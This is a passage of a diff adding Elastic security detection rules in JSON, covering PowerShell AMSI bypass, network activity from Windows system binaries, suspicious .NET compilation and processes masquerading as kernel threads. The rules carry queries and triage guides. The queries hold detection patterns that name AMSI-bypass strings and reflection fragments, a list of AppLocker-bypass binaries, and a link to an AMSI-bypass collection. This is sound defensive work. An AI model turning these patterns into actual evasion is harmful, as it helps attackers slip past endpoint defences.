Antimalware Scan Interface (AMSI) bypasses. An adversary may attempt first to disable AMSI before executing further malicious powershell scripts to evade detection.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-windows.powershell*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Potential Antimalware Scan Interface Bypass via PowerShell", + "note": "## Triage and analysis\n\n### Investigating Potential Antimalware Scan Interface Bypass via PowerShell\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This makes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nThe Windows Antimalware Scan Interface (AMSI) is a versatile interface standard that allows your applications and services to integrate with any antimalware product on a machine. AMSI integrates with multiple Windows components, ranging from User Account Control (UAC) to VBA macros and PowerShell.\n\nThis rule identifies scripts that contain methods and classes that can be abused to bypass AMSI.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration capabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics.\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Determine whether the script was executed and capture relevant information, such as arguments that reveal intent or are indicators of compromise (IoCs).\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate commands and scripts executed after this activity was observed.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe:\n - Observe and collect information about the following activities in the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "event.category:\"process\" and host.os.type:windows and\n (\n powershell.file.script_block_text : (\n \"System.Management.Automation.AmsiUtils\" or\n\t\t\tamsiInitFailed or \n\t\t\t\"Invoke-AmsiBypass\" or \n\t\t\t\"Bypass.AMSI\" or \n\t\t\t\"amsi.dll\" or \n\t\t\tAntimalwareProvider or \n\t\t\tamsiSession or \n\t\t\tamsiContext or\n\t\t\tAmsiInitialize or \n\t\t\tunloadobfuscated or \n\t\t\tunloadsilent or \n\t\t\tAmsiX64 or \n\t\t\tAmsiX32 or \n\t\t\tFindAmsiFun\n ) or\n powershell.file.script_block_text:(\"[System.Runtime.InteropServices.Marshal]::Copy\" and \"VirtualProtect\") or\n powershell.file.script_block_text:(\"[Ref].Assembly.GetType(('System.Management.Automation\" and \".SetValue(\")\n ) and\n not powershell.file.script_block_text : (\n \"sentinelbreakpoints\" and \"Set-PSBreakpoint\"\n )\n", + "references": [ + "https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell" + ], + "related_integrations": [ + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "powershell.file.script_block_text", + "type": "unknown" + } + ], + "risk_score": 73, + "rule_id": "1f0a69c0-3392-4adf-b7d5-6012fd292da8", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: PowerShell Logs", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1562", + "name": "Impair Defenses", + "reference": "https://attack.mitre.org/techniques/T1562/", + "subtechnique": [ + { + "id": "T1562.001", + "name": "Disable or Modify Tools", + "reference": "https://attack.mitre.org/techniques/T1562/001/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 8 + }, + "id": "1f0a69c0-3392-4adf-b7d5-6012fd292da8_8", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/1fe3b299-fbb5-4657-a937-1d746f2c711a_110.json b/packages/security_detection_engine/kibana/security_rule/1fe3b299-fbb5-4657-a937-1d746f2c711a_110.json new file mode 100644 index 00000000000..63b9df99a1a --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/1fe3b299-fbb5-4657-a937-1d746f2c711a_110.json @@ -0,0 +1,118 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies network activity from unexpected system applications. This may indicate adversarial activity as these applications are often leveraged by adversaries to execute code and evade detection.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "winlogbeat-*", + "logs-windows.sysmon_operational-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Unusual Network Activity from a Windows System Binary", + "note": "## Triage and analysis\n\n### Investigating Unusual Network Activity from a Windows System Binary\n\nAttackers can abuse certain trusted developer utilities to proxy the execution of malicious payloads. Since these utilities are usually signed, they can bypass the security controls that were put in place to prevent or detect direct execution.\n\nThis rule identifies network connections established by trusted developer utilities, which can indicate abuse to execute payloads or process masquerading.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate abnormal behaviors observed by the subject process, such as registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- As trusted developer utilities have dual-use purposes, alerts derived from this rule are not essentially malicious. If these utilities are contacting internal or known trusted domains, review their security and consider creating exceptions if the domain is safe.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n - If the malicious file was delivered via phishing:\n - Block the email sender from sending future emails.\n - Block the malicious web pages.\n - Remove emails from the sender from mailboxes.\n - Consider improvements to the security awareness program.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "sequence by process.entity_id with maxspan=5m\n [process where host.os.type == \"windows\" and event.type == \"start\" and\n\n /* known applocker bypasses */\n (process.name : \"bginfo.exe\" or\n process.name : \"cdb.exe\" or\n process.name : \"control.exe\" or\n process.name : \"cmstp.exe\" or\n process.name : \"csi.exe\" or\n process.name : \"dnx.exe\" or\n process.name : \"fsi.exe\" or\n process.name : \"ieexec.exe\" or\n process.name : \"iexpress.exe\" or\n process.name : \"installutil.exe\" or\n process.name : \"Microsoft.Workflow.Compiler.exe\" or\n process.name : \"MSBuild.exe\" or\n process.name : \"msdt.exe\" or\n process.name : \"mshta.exe\" or\n process.name : \"msiexec.exe\" or\n process.name : \"msxsl.exe\" or\n process.name : \"odbcconf.exe\" or\n process.name : \"rcsi.exe\" or\n process.name : \"regsvr32.exe\" or\n process.name : \"xwizard.exe\")]\n [network where\n (process.name : \"bginfo.exe\" or\n process.name : \"cdb.exe\" or\n process.name : \"control.exe\" or\n process.name : \"cmstp.exe\" or\n process.name : \"csi.exe\" or\n process.name : \"dnx.exe\" or\n process.name : \"fsi.exe\" or\n process.name : \"ieexec.exe\" or\n process.name : \"iexpress.exe\" or\n process.name : \"installutil.exe\" or\n process.name : \"Microsoft.Workflow.Compiler.exe\" or\n (\n process.name : \"msbuild.exe\" and\n destination.ip != \"127.0.0.1\"\n ) or\n process.name : \"msdt.exe\" or\n process.name : \"mshta.exe\" or\n (\n process.name : \"msiexec.exe\" and not\n dns.question.name : (\n \"ocsp.digicert.com\", \"ocsp.verisign.com\", \"ocsp.comodoca.com\", \"ocsp.entrust.net\", \"ocsp.usertrust.com\",\n \"ocsp.godaddy.com\", \"ocsp.camerfirma.com\", \"ocsp.globalsign.com\", \"ocsp.sectigo.com\", \"*.local\"\n ) and\n /* Localhost, DigiCert and Comodo CA IP addresses */\n not cidrmatch(destination.ip, \"127.0.0.1\", \"192.229.211.108/32\", \"192.229.221.95/32\",\n \"152.195.38.76/32\", \"104.18.14.101/32\")\n ) or\n process.name : \"msxsl.exe\" or\n process.name : \"odbcconf.exe\" or\n process.name : \"rcsi.exe\" or\n process.name : \"regsvr32.exe\" or\n process.name : \"xwizard.exe\")]\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "destination.ip", + "type": "ip" + }, + { + "ecs": true, + "name": "dns.question.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "1fe3b299-fbb5-4657-a937-1d746f2c711a", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Resources: Investigation Guide", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1127", + "name": "Trusted Developer Utilities Proxy Execution", + "reference": "https://attack.mitre.org/techniques/T1127/", + "subtechnique": [ + { + "id": "T1127.001", + "name": "MSBuild", + "reference": "https://attack.mitre.org/techniques/T1127/001/" + }, + { + "id": "T1218.005", + "name": "Mshta", + "reference": "https://attack.mitre.org/techniques/T1218/005/" + } + ] + }, + { + "id": "T1036", + "name": "Masquerading", + "reference": "https://attack.mitre.org/techniques/T1036/", + "subtechnique": [ + { + "id": "T1036.005", + "name": "Match Legitimate Name or Location", + "reference": "https://attack.mitre.org/techniques/T1036/005/" + } + ] + } + ] + } + ], + "type": "eql", + "version": 110 + }, + "id": "1fe3b299-fbb5-4657-a937-1d746f2c711a_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/201200f1-a99b-43fb-88ed-f65a45c4972c_109.json b/packages/security_detection_engine/kibana/security_rule/201200f1-a99b-43fb-88ed-f65a45c4972c_109.json new file mode 100644 index 00000000000..1d0731b15cf --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/201200f1-a99b-43fb-88ed-f65a45c4972c_109.json @@ -0,0 +1,116 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies executions of .NET compilers with suspicious parent processes, which can indicate an attacker's attempt to compile code after delivery in order to bypass security mechanisms.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious .NET Code Compilation", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.name : (\"csc.exe\", \"vbc.exe\") and\n process.parent.name : (\"wscript.exe\", \"mshta.exe\", \"cscript.exe\", \"wmic.exe\", \"svchost.exe\", \"rundll32.exe\", \"cmstp.exe\", \"regsvr32.exe\")\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "201200f1-a99b-43fb-88ed-f65a45c4972c", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1027", + "name": "Obfuscated Files or Information", + "reference": "https://attack.mitre.org/techniques/T1027/", + "subtechnique": [ + { + "id": "T1027.004", + "name": "Compile After Delivery", + "reference": "https://attack.mitre.org/techniques/T1027/004/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.005", + "name": "Visual Basic", + "reference": "https://attack.mitre.org/techniques/T1059/005/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 109 + }, + "id": "201200f1-a99b-43fb-88ed-f65a45c4972c_109", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/201200f1-a99b-43fb-88ed-f65a45c4972c_110.json b/packages/security_detection_engine/kibana/security_rule/201200f1-a99b-43fb-88ed-f65a45c4972c_110.json new file mode 100644 index 00000000000..5e09cefb03c --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/201200f1-a99b-43fb-88ed-f65a45c4972c_110.json @@ -0,0 +1,116 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies executions of .NET compilers with suspicious parent processes, which can indicate an attacker's attempt to compile code after delivery in order to bypass security mechanisms.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious .NET Code Compilation", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.name : (\"csc.exe\", \"vbc.exe\") and\n process.parent.name : (\"wscript.exe\", \"mshta.exe\", \"cscript.exe\", \"wmic.exe\", \"svchost.exe\", \"rundll32.exe\", \"cmstp.exe\", \"regsvr32.exe\")\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "201200f1-a99b-43fb-88ed-f65a45c4972c", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1027", + "name": "Obfuscated Files or Information", + "reference": "https://attack.mitre.org/techniques/T1027/", + "subtechnique": [ + { + "id": "T1027.004", + "name": "Compile After Delivery", + "reference": "https://attack.mitre.org/techniques/T1027/004/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.005", + "name": "Visual Basic", + "reference": "https://attack.mitre.org/techniques/T1059/005/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 110 + }, + "id": "201200f1-a99b-43fb-88ed-f65a45c4972c_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/202829f6-0271-4e88-b882-11a655c590d4_1.json b/packages/security_detection_engine/kibana/security_rule/202829f6-0271-4e88-b882-11a655c590d4_1.json new file mode 100644 index 00000000000..b57d9816a59 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/202829f6-0271-4e88-b882-11a655c590d4_1.json @@ -0,0 +1,99 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Monitors for kernel processes with associated process executable fields that are not empty. Unix kernel processes such as kthreadd and kworker typically do not have process.executable fields associated to them. Attackers may attempt to hide their malicious programs by masquerading as legitimate kernel processes.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Executable Masquerading as Kernel Process", + "query": "process where host.os.type == \"linux\" and event.action in (\"exec\", \"exec_event\") and event.type == \"start\" and\nprocess.name : (\"kworker*\", \"kthread*\") and process.executable != null\n", + "references": [ + "https://sandflysecurity.com/blog/linux-stealth-rootkit-malware-with-edr-evasion-analyzed/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "202829f6-0271-4e88-b882-11a655c590d4", + "setup": "\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1564", + "name": "Hide Artifacts", + "reference": "https://attack.mitre.org/techniques/T1564/" + }, + { + "id": "T1036", + "name": "Masquerading", + "reference": "https://attack.mitre.org/techniques/T1036/", + "subtechnique": [ + { + "id": "T1036.004", + "name": "Masquerade Task or Service", + "reference": "https://attack.mitre.org/techniques/T1036/004/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 1 + }, + "id": "202829f6-0271-4e88-b882-11a655c590d4_1", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/202829f6-0271-4e88-b882-11a655c590d4_2.json b/packages/security_detection_engine/kibana/security_rule/202829f6-0271-4e88-b882-11a655c590d4_2.json new file mode 100644 index 00000000000..8934eb345bf --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/202829f6-0271-4e88-b882-11a655c590d4_2.json @@ -0,0 +1,99 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Monitors for kernel processes with associated process executable fields that are not empty. Unix kernel processes such as kthreadd and kworker typically do not have process.executable fields associated to them. Attackers may attempt to hide their malicious programs by masquerading as legitimate kernel processes.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Executable Masquerading as Kernel Process", + "query": "process where host.os.type == \"linux\" and event.type == \"start\" and event.action in (\"exec\", \"exec_event\") and\nprocess.name : (\"kworker*\", \"kthread*\") and process.executable != null\n", + "references": [ + "https://sandflysecurity.com/blog/linux-stealth-rootkit-malware-with-edr-evasion-analyzed/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "202829f6-0271-4e88-b882-11a655c590d4", + "setup": "## Setup\n\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1564", + "name": "Hide Artifacts", + "reference": "https://attack.mitre.org/techniques/T1564/" + }, + { + "id": "T1036", + "name": "Masquerading", + "reference": "https://attack.mitre.org/techniques/T1036/", + "subtechnique": [ + { + "id": "T1036.004", + "name": "Masquerade Task or Service", + "reference": "https://attack.mitre.org/techniques/T1036/004/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 2 + }, + "id": "202829f6-0271-4e88-b882-11a655c590d4_2", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/203ab79b-239b-4aa5-8e54-fc50623ee8e4_109.json b/packages/security_detection_engine/kibana/security_rule/203ab79b-239b-4aa5-8e54-fc50623ee8e4_109.json new file mode 100644 index 00000000000..edd1eab3628 --- 